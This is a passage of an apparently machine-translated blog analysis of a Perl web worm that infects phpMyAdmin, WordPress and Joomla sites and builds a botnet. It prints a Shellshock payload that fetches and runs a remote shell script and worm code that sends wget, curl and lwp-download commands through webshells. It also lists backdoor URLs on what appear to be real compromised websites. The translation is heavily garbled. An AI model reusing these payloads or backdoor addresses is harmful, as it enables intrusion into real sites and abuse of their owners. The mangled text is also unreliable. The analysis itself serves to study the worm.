A new generation of powerful web worms has been captured and infected with more than websites.

A new generation of powerful web worms has been captured and infected with more than a thousand websites recently. a novel and powerful web Worm is captured, which functions as a comprehensive vulnerability scanner. The worm mainly exploits high-risk vulnerabilities of some web programs, including phpmyadmin, wordpress, joomla, magento, and other well-known website app vulnerabilities, as well as Shell vulnerabilities, weak ssh passwords, and SQL injection, automatic Elevation of Privilege.

The infected bot will receive commands from the server to launch ddos attacks, scan vulnerabilities to infect other hosts, act as http proxy, and generate irc servers. The analysis showed that there were already 1000 websites as web proxy in infected hosts, and I will share all the source code involved (including the notorious phpmyadmin worm zmeu) in the future ).

0 × 01 cause

Looking at the vps web logs, we saw signs of attacks, including zmeu's useragent and shellshock's payload.

Then, getshell uses a bot (by downloading the database configuration file through a wordpress vulnerability, logging on to wordpress with the database password, but has no permission to install the plug-in, insert the php code parsed by the insertPHP plug-in at the place where the article is modified. the Korean language has been tossing for more than an hour ).

Find a powerful php Trojan in the website directory, support bypass safe mode, install Proxy, and so on, so we decided to explore it in depth.

Some of the source code downloaded on this bot found the shocking CC program.

0 × 02 analysis

This worm only has tens of thousands of lines of pl script code, so please point out the improper analysis. Once a Bot node detects a vulnerability on a server, it downloads and executes the control script on the host, and the host becomes a bot, finally, an email is sent to the controller to register the controlled host. For example, the payload of Shellshock

"() {:;};/Usr/bin/perl-e 'print \" Content-Type: text/plain \ r \ n \ r \ nXSUCCESS! \";

System (\ "wget http://xxxserver.com/shell.txt-O/tmp/shell.txt; curl-O/tmp/shell.txt http: // xxxserver.com/shell.txt;

Perl/tmp/shell.txt; rm-rf shell.txt \");'"

We will analyze the web vulnerability infection process as the main line. To be concise, I will omit some code.

Initialize the remote download server address:

My $ rceinjector = "http://xn--80ahdkbnppbheq0fsb7br0a.xn -- j1amh/error. php ";

My $ rceinjector2 = "http://xn--80ahdkbnppbheq0fsb7br0a.xn -- j1amh/xml. php ";

# My $ arbitrary = "http://www.handelwpolsce.pl/images/Sport/rce.php ";

# My $ hostinjector = "wordpress.com.longlifeweld.com. my ";

My $ thumbid = "http: //". $ hostinjector. "/petx. php ";

My $ thumbidx = "http: //". $ hostinjector. "/cpx. php ";

Linux download commands are passed through web parameters. after a bot successfully exploits the getshell vulnerability, it sends the commands for downloading the controlled scripts to webshell.

My $ wgetdon = "? Cmd = wget % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fmagic. php; wget % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fbtx. php; wget % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fmagic1. php ";

My $ lwpdon = "? Cmd = lwp-download % 20-a % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fmagic. php; lwp-download % 20-a % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fbtx. php; lwp-download % 20-a % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fcpx. php ";

My $ curldon = "? Cmd = curl % 20-C % 20-% 20-O % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fmagic. php; curl % 20-C % 20-% 20-O % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fbtx. php; curl % 20-C % 20-% 20-O % 20 http % 3A % 2F % 2F ". $ hostinjector. "% 2Fcpx. php ";

Initialize 1000 web proxy backdoor addresses to prepare for subsequent batch collection

My @ randombarner = ("http://www.lesyro.cz/administrator/components/com_media/helpers/errors.php ",

"Http://www.villaholidaycentre.co.uk/includes/js/calendar/lang/seka.php ",

"Http://viewwebinars.com/wp-includes/errors.php ",

"Http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php ",

"Http://www.linuxcompany.nl/modules/mod_login/error.php ",

"Http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php ",

"Http://liftoffconsulting.ca/wp-includes/errors.php ",

"Http://www.voileenligne.com/audio/komo.php ",

"Http://www.gingerteastudio.com//wp-content/uploads/components/search.php ",

"Www. audiovisionglobal. pe/online/shortdes/js/calendar/lang/search. php ",

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] Next page